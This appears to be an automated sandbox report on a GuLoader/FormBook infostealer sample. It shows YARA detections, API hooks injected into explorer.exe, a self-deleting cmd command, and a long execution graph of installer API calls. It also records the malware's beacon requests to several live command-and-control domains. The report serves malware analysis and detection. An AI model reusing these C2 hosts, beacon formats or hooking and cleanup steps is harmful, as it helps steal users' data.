Oct 16, 2023 11:31:15.928987980 CEST | 304 | IN | HTTP/1.1 403 Forbidden
Date: Mon, 16 Oct 2023 09:31:15 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4517
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: max-age=15
Expires: Mon, 16 Oct 2023 09:31:30 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MpGK7yZXHWUiYzLtGfchwAQaLzfuKq2WwxungnaqY4dClZ6lkG9HFkWgqR7PcaKKJRzGf8Y5%2BTSWuo90pIrRTe%2FUdCQXbWcMIyE%2FCa44ONOFBWnb3JDYxWv7HtMUKB7OG8CJp%2FRF3wt%2FVEsalg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
Server-Timing: cfRequestDuration;dur=7.999897
Server: cloudflare
CF-RAY: 816f49aff84a5220-LAX
alt-svc: h3=":443"; ma=86400
Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots
Oct 16, 2023 11:31:15.929069042 CEST | 305 | IN | Data Ascii: " content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-c
Oct 16, 2023 11:31:15.929342031 CEST | 306 | IN | Data Ascii: -full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captcha-container --> <div class="cf-section cf-wrapper"> <div class="cf-columns two
Oct 16, 2023 11:31:15.929415941 CEST | 307 | IN | Data Ascii: -0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">816f49aff84a5220</strong></span> <span class="cf-footer-separator sm:hidden">&bull;</spa
Oct 16, 2023 11:31:15.929462910 CEST | 308 | IN | Data Ascii: r-details --> </div>... /#cf-wrapper --> <script> window._cf_translation = {}; </script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
6 | 192.168.11.30 | 50134 | 66.96.162.133 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Oct 16, 2023 11:31:36.580336094 CEST | 308 | OUT | GET /rs10/?wr5xXxu=uVlfmkRF+iVw/eVgHGJAPYTHwOK+gja5lCenY26JIHiuhJtAWLwToWVuFNjfQJtXy5r3&CZF=FZ4P3Z3Pkfe HTTP/1.1
Host: www.omarshafie.online
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Oct 16, 2023 11:31:36.878046989 CEST | 309 | IN | HTTP/1.1 302 Found
Date: Mon, 16 Oct 2023 09:31:36 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 316
Connection: close
Server: Apache/2
Location: https://www.omarshafie.online/rs10/?wr5xXxu=uVlfmkRF+iVw/eVgHGJAPYTHwOK+gja5lCenY26JIHiuhJtAWLwToWVuFNjfQJtXy5r3&CZF=FZ4P3Z3Pkfe
Cache-Control: max-age=3600
Expires: Mon, 16 Oct 2023 10:31:36 GMT
Age: 0
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://www.omarshafie.online/rs10/?wr5xXxu=uVlfmkRF+iVw/eVgHGJAPYTHwOK+gja5lCenY26JIHiuhJtAWLwToWVuFNjfQJtXy5r3&amp;CZF=FZ4P3Z3Pkfe">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
7 | 192.168.11.30 | 50135 | 104.247.82.90 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Oct 16, 2023 11:31:57.444381952 CEST | 310 | OUT | GET /rs10/?CZF=FZ4P3Z3Pkfe&wr5xXxu=KT0d1e3BBcKFYE425gVaQdIZfgENHgjmY2M2c9Bsa4V4Og8kkivQcwUvXP4wlMvPRBCl HTTP/1.1
Host: www.electric-cars-19095.bond
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Oct 16, 2023 11:31:57.686768055 CEST | 310 | IN | HTTP/1.1 403 Forbidden
Server: nginx
Date: Mon, 16 Oct 2023 09:31:57 GMT
Content-Type: text/html
Content-Length: 146
Connection: close
Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Oct 16, 2023 11:31:57.894397974 CEST | 311 | IN | HTTP/1.1 403 Forbidden
Server: nginx
Date: Mon, 16 Oct 2023 09:31:57 GMT
Content-Type: text/html
Content-Length: 146
Connection: close
Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
8 | 192.168.11.30 | 50138 | 3.33.130.190 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Oct 16, 2023 11:32:59.120800018 CEST | 328 | OUT | GET /rs10/?wr5xXxu=tDFPqbQSWha/CSL3nrPGL7FBUiRZeUezwZrLB2afcgfzzGJsCl08dK+Vf/r9oM/AKN8c&CZF=FZ4P3Z3Pkfe HTTP/1.1
Host: www.latitudeinformatics.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Oct 16, 2023 11:32:59.352847099 CEST | 328 | IN | HTTP/1.1 403 Forbidden
Server: openresty
Date: Mon, 16 Oct 2023 09:32:59 GMT
Content-Type: text/html
Content-Length: 291
Connection: close
ETag: "65271109-123"
Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
9 | 192.168.11.30 | 50141 | 172.67.193.177 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Oct 16, 2023 11:33:40.532597065 CEST | 334 | OUT | GET /rs10/?wr5xXxu=OJwcZLoBL0+y/b1nUKgyY9euQNPYkahm34mOnyUSFfzLd1inlK2E8ylg3tCjMnF+BDY5&CZF=FZ4P3Z3Pkfe HTTP/1.1
Host: www.hdlive7.live
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Oct 16, 2023 11:33:40.708460093 CEST | 334 | IN | HTTP/1.1 301 Moved Permanently
Date: Mon, 16 Oct 2023 09:33:40 GMT
Transfer-Encoding: chunked
Connection: close
Cache-Control: max-age=3600
Expires: Mon, 16 Oct 2023 10:33:40 GMT
Location: https://www.hdlive7.live/rs10/?wr5xXxu=OJwcZLoBL0+y/b1nUKgyY9euQNPYkahm34mOnyUSFfzLd1inlK2E8ylg3tCjMnF+BDY5&CZF=FZ4P3Z3Pkfe
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FjQuvMpeHdNr7qHSxlUg0K9zKU0jhkYPlfxqqBdtkWhQnxiESCsONPRx5qTPHCaFqvxeC07TIUKen9GHSEykaMg3LRgTfzr5%2Ful91tFbLAD%2BAZKJnMwQV8eeuX8zC1KefkDr"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 816f4d38dab42b98-LAX
alt-svc: h3=":443"; ma=86400
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                      Code Manipulations

Function Name | Hook Type | Active in Processes
PeekMessageA | INLINE | explorer.exe
PeekMessageW | INLINE | explorer.exe
GetMessageW | INLINE | explorer.exe
GetMessageA | INLINE | explorer.exe

Function Name | Hook Type | New Data
PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x8A 0xAE 0xE5
PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x82 0x2E 0xE5
GetMessageW | INLINE | 0x48 0x8B 0xB8 0x82 0x2E 0xE5
GetMessageA | INLINE | 0x48 0x8B 0xB8 0x8A 0xAE 0xE5

                                                                                      Target ID:5
                                                                                      Start time:11:26:38
                                                                                      Start date:16/10/2023
                                                                                      Path:C:\Users\user\Desktop\jU0hAXFL0k.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\user\Desktop\jU0hAXFL0k.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:1'272'864 bytes
                                                                                      MD5 hash:6E8215EEE3034D6DCF18D79D397E5715
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.2064063985138.0000000009FD3000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:12
                                                                                      Start time:11:27:28
                                                                                      Start date:16/10/2023
                                                                                      Path:C:\Users\user\Desktop\jU0hAXFL0k.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\user\Desktop\jU0hAXFL0k.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:1'272'864 bytes
                                                                                      MD5 hash:6E8215EEE3034D6DCF18D79D397E5715
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.2064580784590.0000000000170000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.2064580784590.0000000000170000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.2064580784590.0000000000170000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.2064580784590.0000000000170000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.2064580784590.0000000000170000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:13
                                                                                      Start time:11:27:48
                                                                                      Start date:16/10/2023
                                                                                      Path:C:\Windows\explorer.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\Explorer.EXE
                                                                                      Imagebase:0x7ff6e35c0000
                                                                                      File size:4'849'904 bytes
                                                                                      MD5 hash:5EA66FF5AE5612F921BC9DA23BAC95F7
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      Target ID:14
                                                                                      Start time:11:28:37
                                                                                      Start date:16/10/2023
                                                                                      Path:C:\Windows\SysWOW64\autofmt.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\SysWOW64\autofmt.exe
                                                                                      Imagebase:0xed0000
                                                                                      File size:831'488 bytes
                                                                                      MD5 hash:ABC9F7DAB410FE452D2D90C9960077BE
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      Target ID:15
                                                                                      Start time:11:28:37
                                                                                      Start date:16/10/2023
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\SysWOW64\cmd.exe
                                                                                      Imagebase:0xd60000
                                                                                      File size:236'544 bytes
                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2068461907526.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.2068461907526.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.2068461907526.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.2068461907526.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.2068461907526.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.2068461407069.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.2068462935057.0000000003710000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.2068462935057.0000000003710000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.2068462935057.0000000003710000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.2068462935057.0000000003710000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                      • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.2068462935057.0000000003710000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      Target ID:16
                                                                                      Start time:11:28:40
                                                                                      Start date:16/10/2023
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:/c del "C:\Users\user\Desktop\jU0hAXFL0k.exe"
                                                                                      Imagebase:0xd60000
                                                                                      File size:236'544 bytes
                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:17
                                                                                      Start time:11:28:41
                                                                                      Start date:16/10/2023
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff6989f0000
                                                                                      File size:875'008 bytes
                                                                                      MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true


                                                                                        Execution Graph

                                                                                        Execution Coverage:20.7%
                                                                                        Dynamic/Decrypted Code Coverage:14%
                                                                                        Signature Coverage:19.4%
                                                                                        Total number of Nodes:1534
                                                                                        Total number of Limit Nodes:48
5562->5565 5563->5537 5564 4046d3 5566 406372 5 API calls 5564->5566 5565->5541 5574 4046da 5566->5574 5568 40465a lstrcmpiA 5567->5568 5568->5563 5570 40466b lstrcatA 5568->5570 5569 404716 5595 405fda lstrcpynA 5569->5595 5570->5563 5572 40471d 5573 405a0b 4 API calls 5572->5573 5575 404723 GetDiskFreeSpaceA 5573->5575 5574->5569 5578 4059b9 2 API calls 5574->5578 5580 40476e 5574->5580 5577 404747 MulDiv 5575->5577 5575->5580 5577->5580 5578->5574 5579 4047df 5582 404802 5579->5582 5584 40140b 2 API calls 5579->5584 5580->5579 5581 404976 20 API calls 5580->5581 5583 4047cc 5581->5583 5596 40408a KiUserCallbackDispatcher 5582->5596 5585 4047e1 SetDlgItemTextA 5583->5585 5586 4047d1 5583->5586 5584->5582 5585->5579 5588 4048b1 20 API calls 5586->5588 5588->5579 5589 40481e 5589->5540 5590 404453 SendMessageA 5589->5590 5590->5540 5591->5535 5592->5562 5593->5547 5594->5564 5595->5572 5596->5589 5597 401cfb 5598 402b0a 17 API calls 5597->5598 5599 401d02 5598->5599 5600 402b0a 17 API calls 5599->5600 5601 401d0e GetDlgItem 5600->5601 5602 4025e4 5601->5602 5603 4018fd 5604 401934 5603->5604 5605 402b2c 17 API calls 5604->5605 5606 401939 5605->5606 5607 4057a2 67 API calls 5606->5607 5608 401942 5607->5608 5609 401dff GetDC 5610 402b0a 17 API calls 5609->5610 5611 401e11 GetDeviceCaps MulDiv ReleaseDC 5610->5611 5612 402b0a 17 API calls 5611->5612 5613 401e42 5612->5613 5614 405ffc 17 API calls 5613->5614 5615 401e7f CreateFontIndirectA 5614->5615 5616 4025e4 5615->5616 5617 401000 5618 401037 BeginPaint GetClientRect 5617->5618 5619 40100c DefWindowProcA 5617->5619 5621 4010f3 5618->5621 5622 401179 5619->5622 5623 401073 CreateBrushIndirect FillRect DeleteObject 5621->5623 5624 4010fc 5621->5624 5623->5621 5625 401102 CreateFontIndirectA 5624->5625 5626 401167 EndPaint 5624->5626 5625->5626 5627 401112 6 API calls 5625->5627 5626->5622 5627->5626 5628 401900 5629 402b2c 17 API calls 5628->5629 5630 401907 5629->5630 5631 4056f6 MessageBoxIndirectA 5630->5631 
5632 401910 5631->5632 5633 401502 5634 40150a 5633->5634 5636 40151d 5633->5636 5635 402b0a 17 API calls 5634->5635 5635->5636 4161 6fe92921 4162 6fe92971 4161->4162 4163 6fe92931 VirtualProtect 4161->4163 4163->4162 4364 401c0a 4386 402b0a 4364->4386 4366 401c11 4367 402b0a 17 API calls 4366->4367 4368 401c1e 4367->4368 4369 401c33 4368->4369 4370 402b2c 17 API calls 4368->4370 4371 401c43 4369->4371 4372 402b2c 17 API calls 4369->4372 4370->4369 4373 401c9a 4371->4373 4374 401c4e 4371->4374 4372->4371 4375 402b2c 17 API calls 4373->4375 4376 402b0a 17 API calls 4374->4376 4377 401c9f 4375->4377 4378 401c53 4376->4378 4380 402b2c 17 API calls 4377->4380 4379 402b0a 17 API calls 4378->4379 4381 401c5f 4379->4381 4382 401ca8 FindWindowExA 4380->4382 4383 401c8a SendMessageA 4381->4383 4384 401c6c SendMessageTimeoutA 4381->4384 4385 401cc6 4382->4385 4383->4385 4384->4385 4387 405ffc 17 API calls 4386->4387 4388 402b1f 4387->4388 4388->4366 4412 401e8f 4413 402b0a 17 API calls 4412->4413 4414 401e95 4413->4414 4415 402b0a 17 API calls 4414->4415 4416 401ea1 4415->4416 4417 401eb8 EnableWindow 4416->4417 4418 401ead ShowWindow 4416->4418 4419 4029b8 4417->4419 4418->4419 5644 401490 5645 405101 24 API calls 5644->5645 5646 401497 5645->5646 5647 6fe91638 5648 6fe91667 5647->5648 5649 6fe91a98 18 API calls 5648->5649 5650 6fe9166e 5649->5650 5651 6fe91681 5650->5651 5652 6fe91675 5650->5652 5654 6fe916a8 5651->5654 5655 6fe9168b 5651->5655 5653 6fe91266 2 API calls 5652->5653 5658 6fe9167f 5653->5658 5656 6fe916ae 5654->5656 5657 6fe916d2 5654->5657 5659 6fe914e2 3 API calls 5655->5659 5660 6fe91559 3 API calls 5656->5660 5661 6fe914e2 3 API calls 5657->5661 5662 6fe91690 5659->5662 5663 6fe916b3 5660->5663 5661->5658 5664 6fe91559 3 API calls 5662->5664 5665 6fe91266 2 API calls 5663->5665 5666 6fe91696 5664->5666 5667 6fe916b9 GlobalFree 5665->5667 5668 6fe91266 2 API calls 5666->5668 5667->5658 5669 6fe916cd GlobalFree 5667->5669 5670 6fe9169c GlobalFree 5668->5670 
5669->5658 5670->5658 5671 402993 SendMessageA 5672 4029b8 5671->5672 5673 4029ad InvalidateRect 5671->5673 5673->5672 4636 403b94 4637 403ce7 4636->4637 4638 403bac 4636->4638 4640 403cf8 GetDlgItem GetDlgItem 4637->4640 4649 403d38 4637->4649 4638->4637 4639 403bb8 4638->4639 4641 403bc3 SetWindowPos 4639->4641 4642 403bd6 4639->4642 4643 404068 18 API calls 4640->4643 4641->4642 4646 403bf3 4642->4646 4647 403bdb ShowWindow 4642->4647 4648 403d22 SetClassLongA 4643->4648 4644 403d92 4655 403ce2 4644->4655 4707 4040b4 4644->4707 4650 403c15 4646->4650 4651 403bfb DestroyWindow 4646->4651 4647->4646 4652 40140b 2 API calls 4648->4652 4649->4644 4653 401389 2 API calls 4649->4653 4657 403c1a SetWindowLongA 4650->4657 4658 403c2b 4650->4658 4656 403ff1 4651->4656 4652->4649 4654 403d6a 4653->4654 4654->4644 4659 403d6e SendMessageA 4654->4659 4656->4655 4665 404022 ShowWindow 4656->4665 4657->4655 4662 403cd4 4658->4662 4663 403c37 GetDlgItem 4658->4663 4659->4655 4660 40140b 2 API calls 4680 403da4 4660->4680 4661 403ff3 DestroyWindow EndDialog 4661->4656 4664 4040cf 8 API calls 4662->4664 4666 403c67 4663->4666 4667 403c4a SendMessageA IsWindowEnabled 4663->4667 4664->4655 4665->4655 4669 403c74 4666->4669 4670 403cbb SendMessageA 4666->4670 4671 403c87 4666->4671 4681 403c6c 4666->4681 4667->4655 4667->4666 4668 405ffc 17 API calls 4668->4680 4669->4670 4669->4681 4670->4662 4674 403ca4 4671->4674 4675 403c8f 4671->4675 4673 404068 18 API calls 4673->4680 4678 40140b 2 API calls 4674->4678 4720 40140b 4675->4720 4676 403ca2 4676->4662 4679 403cab 4678->4679 4679->4662 4679->4681 4680->4655 4680->4660 4680->4661 4680->4668 4680->4673 4682 404068 18 API calls 4680->4682 4698 403f33 DestroyWindow 4680->4698 4723 404041 4681->4723 4683 403e1f GetDlgItem 4682->4683 4684 403e34 4683->4684 4685 403e3c ShowWindow KiUserCallbackDispatcher 4683->4685 4684->4685 4710 40408a KiUserCallbackDispatcher 4685->4710 4687 403e66 EnableWindow 4692 403e7a 4687->4692 4688 403e7f 
GetSystemMenu EnableMenuItem SendMessageA 4689 403eaf SendMessageA 4688->4689 4688->4692 4689->4692 4692->4688 4711 40409d SendMessageA 4692->4711 4712 403b75 4692->4712 4715 405fda lstrcpynA 4692->4715 4694 403ede lstrlenA 4695 405ffc 17 API calls 4694->4695 4696 403eef SetWindowTextA 4695->4696 4716 401389 4696->4716 4698->4656 4699 403f4d CreateDialogParamA 4698->4699 4699->4656 4700 403f80 4699->4700 4701 404068 18 API calls 4700->4701 4702 403f8b GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4701->4702 4703 401389 2 API calls 4702->4703 4704 403fd1 4703->4704 4704->4655 4705 403fd9 ShowWindow 4704->4705 4706 4040b4 SendMessageA 4705->4706 4706->4656 4708 4040cc 4707->4708 4709 4040bd SendMessageA 4707->4709 4708->4680 4709->4708 4710->4687 4711->4692 4713 405ffc 17 API calls 4712->4713 4714 403b83 SetWindowTextA 4713->4714 4714->4692 4715->4694 4718 401390 4716->4718 4717 4013fe 4717->4680 4718->4717 4719 4013cb MulDiv SendMessageA 4718->4719 4719->4718 4721 401389 2 API calls 4720->4721 4722 401420 4721->4722 4722->4681 4724 404048 4723->4724 4725 40404e SendMessageA 4723->4725 4724->4725 4725->4676 5674 6fe9103d 5677 6fe9101b 5674->5677 5678 6fe914bb GlobalFree 5677->5678 5679 6fe91020 5678->5679 5680 6fe91024 5679->5680 5681 6fe91027 GlobalAlloc 5679->5681 5682 6fe914e2 3 API calls 5680->5682 5681->5680 5683 6fe9103b 5682->5683 5684 401f98 5685 402b2c 17 API calls 5684->5685 5686 401f9f 5685->5686 5687 4062dd 2 API calls 5686->5687 5688 401fa5 5687->5688 5690 401fb7 5688->5690 5691 405f38 wsprintfA 5688->5691 5691->5690 5115 40159d 5116 402b2c 17 API calls 5115->5116 5117 4015a4 SetFileAttributesA 5116->5117 5118 4015b6 5117->5118 5706 40149d 5707 4014ab PostQuitMessage 5706->5707 5708 40234e 5706->5708 5707->5708 5119 401a1e 5120 402b2c 17 API calls 5119->5120 5121 401a27 ExpandEnvironmentStringsA 5120->5121 5122 401a3b 5121->5122 5124 401a4e 5121->5124 5123 401a40 lstrcmpA 5122->5123 5122->5124 5123->5124 5714 40289e 5715 402b0a 17 API calls 
5714->5715 5716 4028a4 5715->5716 5717 4028e3 5716->5717 5718 4028cc 5716->5718 5726 402783 5716->5726 5719 4028fd 5717->5719 5720 4028ed 5717->5720 5723 4028d1 5718->5723 5724 4028e0 5718->5724 5722 405ffc 17 API calls 5719->5722 5721 402b0a 17 API calls 5720->5721 5721->5724 5722->5724 5728 405fda lstrcpynA 5723->5728 5724->5726 5729 405f38 wsprintfA 5724->5729 5728->5726 5729->5726 5730 40419e lstrcpynA lstrlenA 5731 6fe91837 5732 6fe9185a 5731->5732 5733 6fe9188a GlobalFree 5732->5733 5734 6fe9189c 5732->5734 5733->5734 5735 6fe91266 2 API calls 5734->5735 5736 6fe91a1e GlobalFree GlobalFree 5735->5736 5737 40171f 5738 402b2c 17 API calls 5737->5738 5739 401726 SearchPathA 5738->5739 5740 401741 5739->5740 5741 401d20 5742 402b0a 17 API calls 5741->5742 5743 401d2e SetWindowLongA 5742->5743 5744 4029b8 5743->5744 5745 402721 5746 402727 5745->5746 5747 4029b8 5746->5747 5748 40272f FindClose 5746->5748 5748->5747 5749 406a23 5753 4064ea 5749->5753 5750 406e55 5751 406574 GlobalAlloc 5751->5750 5751->5753 5752 40656b GlobalFree 5752->5751 5753->5750 5753->5751 5753->5752 5753->5753 5754 4065e2 GlobalFree 5753->5754 5755 4065eb GlobalAlloc 5753->5755 5754->5755 5755->5750 5755->5753 4113 4023a7 4114 402b2c 17 API calls 4113->4114 4115 4023b8 4114->4115 4116 402b2c 17 API calls 4115->4116 4117 4023c1 4116->4117 4118 402b2c 17 API calls 4117->4118 4119 4023cb GetPrivateProfileStringA 4118->4119 5756 6fe91000 5757 6fe9101b 5 API calls 5756->5757 5758 6fe91019 5757->5758 5759 40292c 5760 402b0a 17 API calls 5759->5760 5761 402932 5760->5761 5762 402967 5761->5762 5763 402783 5761->5763 5765 402944 5761->5765 5762->5763 5764 405ffc 17 API calls 5762->5764 5764->5763 5765->5763 5767 405f38 wsprintfA 5765->5767 5767->5763 4420 402631 4421 402b0a 17 API calls 4420->4421 4425 40263b 4421->4425 4422 4026a9 4424 4026ab 4431 405f38 wsprintfA 4424->4431 4425->4422 4425->4424 4426 4026bb 4425->4426 4429 405beb ReadFile 4425->4429 4426->4422 4428 4026d1 SetFilePointer 
4426->4428 4428->4422 4430 405c09 4429->4430 4430->4425 4431->4422 4432 401932 4433 401934 4432->4433 4434 402b2c 17 API calls 4433->4434 4435 401939 4434->4435 4438 4057a2 4435->4438 4478 405a60 4438->4478 4441 4057e1 4443 405919 4441->4443 4492 405fda lstrcpynA 4441->4492 4442 4057ca DeleteFileA 4448 401942 4442->4448 4443->4448 4510 4062dd FindFirstFileA 4443->4510 4445 405807 4446 40581a 4445->4446 4447 40580d lstrcatA 4445->4447 4493 4059b9 lstrlenA 4446->4493 4449 405820 4447->4449 4452 40582e lstrcatA 4449->4452 4454 405839 lstrlenA FindFirstFileA 4449->4454 4452->4454 4456 40590f 4454->4456 4476 40585d 4454->4476 4455 405937 4513 405972 lstrlenA CharPrevA 4455->4513 4456->4443 4458 40599d CharNextA 4458->4476 4460 40575a 5 API calls 4461 405949 4460->4461 4462 405963 4461->4462 4463 40594d 4461->4463 4465 405101 24 API calls 4462->4465 4463->4448 4467 405101 24 API calls 4463->4467 4465->4448 4466 4058ee FindNextFileA 4468 405906 FindClose 4466->4468 4466->4476 4469 40595a 4467->4469 4468->4456 4470 405db9 36 API calls 4469->4470 4473 405961 4470->4473 4472 4057a2 60 API calls 4472->4476 4473->4448 4474 405101 24 API calls 4474->4466 4475 405101 24 API calls 4475->4476 4476->4458 4476->4466 4476->4472 4476->4474 4476->4475 4497 